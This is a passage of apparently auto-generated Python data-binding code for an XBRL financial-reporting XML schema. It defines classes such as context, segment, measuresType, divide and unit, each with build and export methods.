if value is not None and 'xsi:type' not in already_processed:
already_processed.add('xsi:type')
self.extensiontype_ = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class tokenItemType
class languageItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if languageItemType.subclass:
return languageItemType.subclass(*args_, **kwargs_)
else:
return languageItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='languageItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='languageItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='languageItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='languageItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='languageItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class languageItemType
class NameItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if NameItemType.subclass:
return NameItemType.subclass(*args_, **kwargs_)
else:
return NameItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='NameItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='NameItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='NameItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='NameItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='NameItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class NameItemType
class NCNameItemType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, contextRef=None, valueOf_=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.contextRef = _cast(None, contextRef)
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if NCNameItemType.subclass:
return NCNameItemType.subclass(*args_, **kwargs_)
else:
return NCNameItemType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_id(self): return self.id
def set_id(self, id): self.id = id
def get_contextRef(self): return self.contextRef
def set_contextRef(self, contextRef): self.contextRef = contextRef
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.valueOf_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='NCNameItemType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='NCNameItemType')
if self.hasContent_():
outfile.write('>')
outfile.write(str(self.valueOf_).encode(ExternalEncoding))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='NCNameItemType', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='NCNameItemType'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
if self.contextRef is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
outfile.write(' contextRef=%s' % (quote_attrib(self.contextRef), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='NCNameItemType', fromsubclass_=False, pretty_print=True):
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
value = find_attr_value_('contextRef', node)
if value is not None and 'contextRef' not in already_processed:
already_processed.add('contextRef')
self.contextRef = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class NCNameItemType
class segment(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, anytypeobjs_=None):
self.original_tagname_ = None
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if segment.subclass:
return segment.subclass(*args_, **kwargs_)
else:
return segment(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def hasContent_(self):
if (
self.anytypeobjs_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='segment', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='segment')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='segment', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='segment'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='segment', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for obj_ in self.anytypeobjs_:
obj_.export(outfile, level, namespace_, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
obj_ = self.gds_build_any(child_, 'segment')
if obj_ is not None:
self.add_anytypeobjs_(obj_)
# end class segment
class contextEntityType(GeneratedsSuper):
"""The type for the entity element, used to describe the reporting
entity. Note that the scheme attribute is required and cannot be
empty."""
subclass = None
superclass = None
def __init__(self, identifier=None, segment=None):
self.original_tagname_ = None
self.identifier = identifier
self.segment = segment
def factory(*args_, **kwargs_):
if contextEntityType.subclass:
return contextEntityType.subclass(*args_, **kwargs_)
else:
return contextEntityType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_identifier(self): return self.identifier
def set_identifier(self, identifier): self.identifier = identifier
def get_segment(self): return self.segment
def set_segment(self, segment): self.segment = segment
def hasContent_(self):
if (
self.identifier is not None or
self.segment is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='contextEntityType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='contextEntityType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='contextEntityType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='contextEntityType'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='contextEntityType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.identifier is not None:
self.identifier.export(outfile, level, namespace_, name_='identifier', pretty_print=pretty_print)
if self.segment is not None:
self.segment.export(outfile, level, namespace_='xbrli:', name_='segment', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'identifier':
obj_ = identifierType.factory()
obj_.build(child_)
self.identifier = obj_
obj_.original_tagname_ = 'identifier'
elif nodeName_ == 'segment':
obj_ = segment.factory()
obj_.build(child_)
self.segment = obj_
obj_.original_tagname_ = 'segment'
# end class contextEntityType
class contextPeriodType(GeneratedsSuper):
"""The type for the period element, used to describe the reporting date
info."""
subclass = None
superclass = None
def __init__(self, startDate=None, endDate=None, instant=None, forever=None):
self.original_tagname_ = None
self.startDate = startDate
self.validate_dateUnion(self.startDate)
self.endDate = endDate
self.validate_dateUnion(self.endDate)
self.instant = instant
self.validate_dateUnion(self.instant)
self.forever = forever
def factory(*args_, **kwargs_):
if contextPeriodType.subclass:
return contextPeriodType.subclass(*args_, **kwargs_)
else:
return contextPeriodType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_startDate(self): return self.startDate
def set_startDate(self, startDate): self.startDate = startDate
def get_endDate(self): return self.endDate
def set_endDate(self, endDate): self.endDate = endDate
def get_instant(self): return self.instant
def set_instant(self, instant): self.instant = instant
def get_forever(self): return self.forever
def set_forever(self, forever): self.forever = forever
def validate_dateUnion(self, value):
# Validate type dateUnion, a restriction on None.
pass
def hasContent_(self):
if (
self.startDate is not None or
self.endDate is not None or
self.instant is not None or
self.forever is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='contextPeriodType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='contextPeriodType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='contextPeriodType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='contextPeriodType'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='contextPeriodType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.startDate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sstartDate>%s</%sstartDate>%s' % (namespace_, self.gds_format_string(quote_xml(self.startDate).encode(ExternalEncoding), input_name='startDate'), namespace_, eol_))
if self.endDate is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sendDate>%s</%sendDate>%s' % (namespace_, self.gds_format_string(quote_xml(self.endDate).encode(ExternalEncoding), input_name='endDate'), namespace_, eol_))
if self.instant is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<%sinstant>%s</%sinstant>%s' % (namespace_, self.gds_format_string(quote_xml(self.instant).encode(ExternalEncoding), input_name='instant'), namespace_, eol_))
if self.forever is not None:
self.forever.export(outfile, level, namespace_, name_='forever', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'startDate':
startDate_ = child_.text
startDate_ = self.gds_validate_string(startDate_, node, 'startDate')
self.startDate = startDate_
# validate type dateUnion
self.validate_dateUnion(self.startDate)
elif nodeName_ == 'endDate':
endDate_ = child_.text
endDate_ = self.gds_validate_string(endDate_, node, 'endDate')
self.endDate = endDate_
# validate type dateUnion
self.validate_dateUnion(self.endDate)
elif nodeName_ == 'instant':
instant_ = child_.text
instant_ = self.gds_validate_string(instant_, node, 'instant')
self.instant = instant_
# validate type dateUnion
self.validate_dateUnion(self.instant)
elif nodeName_ == 'forever':
obj_ = foreverType.factory()
obj_.build(child_)
self.forever = obj_
obj_.original_tagname_ = 'forever'
# end class contextPeriodType
class contextScenarioType(GeneratedsSuper):
"""Used for the scenario under which fact have been reported."""
subclass = None
superclass = None
def __init__(self, anytypeobjs_=None):
self.original_tagname_ = None
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
def factory(*args_, **kwargs_):
if contextScenarioType.subclass:
return contextScenarioType.subclass(*args_, **kwargs_)
else:
return contextScenarioType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def hasContent_(self):
if (
self.anytypeobjs_
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='contextScenarioType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='contextScenarioType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='contextScenarioType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='contextScenarioType'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='contextScenarioType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for obj_ in self.anytypeobjs_:
obj_.export(outfile, level, namespace_, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
obj_ = self.gds_build_any(child_, 'contextScenarioType')
if obj_ is not None:
self.add_anytypeobjs_(obj_)
# end class contextScenarioType
class context(GeneratedsSuper):
"""Used for an island of context to which facts can be related."""
subclass = None
superclass = None
def __init__(self, id=None, entity=None, period=None, scenario=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.entity = entity
self.period = period
self.scenario = scenario
def factory(*args_, **kwargs_):
if context.subclass:
return context.subclass(*args_, **kwargs_)
else:
return context(*args_, **kwargs_)
factory = staticmethod(factory)
def get_entity(self): return self.entity
def set_entity(self, entity): self.entity = entity
def get_period(self): return self.period
def set_period(self, period): self.period = period
def get_scenario(self): return self.scenario
def set_scenario(self, scenario): self.scenario = scenario
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.entity is not None or
self.period is not None or
self.scenario is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='context', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='context')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='context', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='context'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='context', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.entity is not None:
self.entity.export(outfile, level, namespace_, name_='entity', pretty_print=pretty_print)
if self.period is not None:
self.period.export(outfile, level, namespace_, name_='period', pretty_print=pretty_print)
if self.scenario is not None:
self.scenario.export(outfile, level, namespace_, name_='scenario', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'entity':
obj_ = contextEntityType.factory()
obj_.build(child_)
self.entity = obj_
obj_.original_tagname_ = 'entity'
elif nodeName_ == 'period':
obj_ = contextPeriodType.factory()
obj_.build(child_)
self.period = obj_
obj_.original_tagname_ = 'period'
elif nodeName_ == 'scenario':
obj_ = contextScenarioType.factory()
obj_.build(child_)
self.scenario = obj_
obj_.original_tagname_ = 'scenario'
# end class context
class measuresType(GeneratedsSuper):
"""A collection of sibling measure elements"""
subclass = None
superclass = None
def __init__(self, measure=None):
self.original_tagname_ = None
if measure is None:
self.measure = []
else:
self.measure = measure
def factory(*args_, **kwargs_):
if measuresType.subclass:
return measuresType.subclass(*args_, **kwargs_)
else:
return measuresType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_measure(self): return self.measure
def set_measure(self, measure): self.measure = measure
def add_measure(self, value): self.measure.append(value)
def insert_measure_at(self, index, value): self.measure.insert(index, value)
def replace_measure_at(self, index, value): self.measure[index] = value
def hasContent_(self):
if (
self.measure
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='measuresType', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='measuresType')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='measuresType', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='measuresType'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='measuresType', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for measure_ in self.measure:
showIndent(outfile, level, pretty_print)
outfile.write('<%smeasure>%s</%smeasure>%s' % (namespace_, self.gds_format_string(quote_xml(measure_).encode(ExternalEncoding), input_name='measure'), namespace_, eol_))
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'measure':
measure_ = child_.text
measure_ = self.gds_validate_string(measure_, node, 'measure')
self.measure.append(measure_)
# end class measuresType
class divide(GeneratedsSuper):
"""Element used to represent division in units"""
subclass = None
superclass = None
def __init__(self, unitNumerator=None, unitDenominator=None):
self.original_tagname_ = None
self.unitNumerator = unitNumerator
self.unitDenominator = unitDenominator
def factory(*args_, **kwargs_):
if divide.subclass:
return divide.subclass(*args_, **kwargs_)
else:
return divide(*args_, **kwargs_)
factory = staticmethod(factory)
def get_unitNumerator(self): return self.unitNumerator
def set_unitNumerator(self, unitNumerator): self.unitNumerator = unitNumerator
def get_unitDenominator(self): return self.unitDenominator
def set_unitDenominator(self, unitDenominator): self.unitDenominator = unitDenominator
def hasContent_(self):
if (
self.unitNumerator is not None or
self.unitDenominator is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='divide', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='divide')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='divide', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='divide'):
pass
def exportChildren(self, outfile, level, namespace_='finassist:', name_='divide', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.unitNumerator is not None:
self.unitNumerator.export(outfile, level, namespace_, name_='unitNumerator', pretty_print=pretty_print)
if self.unitDenominator is not None:
self.unitDenominator.export(outfile, level, namespace_, name_='unitDenominator', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'unitNumerator':
obj_ = measuresType.factory()
obj_.build(child_)
self.unitNumerator = obj_
obj_.original_tagname_ = 'unitNumerator'
elif nodeName_ == 'unitDenominator':
obj_ = measuresType.factory()
obj_.build(child_)
self.unitDenominator = obj_
obj_.original_tagname_ = 'unitDenominator'
# end class divide
class unit(GeneratedsSuper):
"""Element used to represent units information about numeric items"""
subclass = None
superclass = None
def __init__(self, id=None, measure=None, divide=None):
self.original_tagname_ = None
self.id = _cast(None, id)
if measure is None:
self.measure = []
else:
self.measure = measure
self.divide = divide
def factory(*args_, **kwargs_):
if unit.subclass:
return unit.subclass(*args_, **kwargs_)
else:
return unit(*args_, **kwargs_)
factory = staticmethod(factory)
def get_measure(self): return self.measure
def set_measure(self, measure): self.measure = measure
def add_measure(self, value): self.measure.append(value)
def insert_measure_at(self, index, value): self.measure.insert(index, value)
def replace_measure_at(self, index, value): self.measure[index] = value
def get_divide(self): return self.divide
def set_divide(self, divide): self.divide = divide
def get_id(self): return self.id
def set_id(self, id): self.id = id
def hasContent_(self):
if (
self.measure or
self.divide is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='unit', namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25" xmlns:xbrli="http://www.xbrl.org/2003/instance" ', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='unit')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='unit', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='unit'):
if self.id is not None and 'id' not in already_processed:
already_processed.add('id')
outfile.write(' id=%s' % (quote_attrib(self.id), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='unit', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
for measure_ in self.measure:
showIndent(outfile, level, pretty_print)
outfile.write('<%smeasure>%s</%smeasure>%s' % (namespace_, self.gds_format_string(quote_xml(measure_).encode(ExternalEncoding), input_name='measure'), namespace_, eol_))
if self.divide is not None:
self.divide.export(outfile, level, namespace_='xbrli:', name_='divide', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('id', node)
if value is not None and 'id' not in already_processed:
already_processed.add('id')
self.id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'measure':
measure_ = child_.text
measure_ = self.gds_validate_string(measure_, node, 'measure')
self.measure.append(measure_)
elif nodeName_ == 'divide':
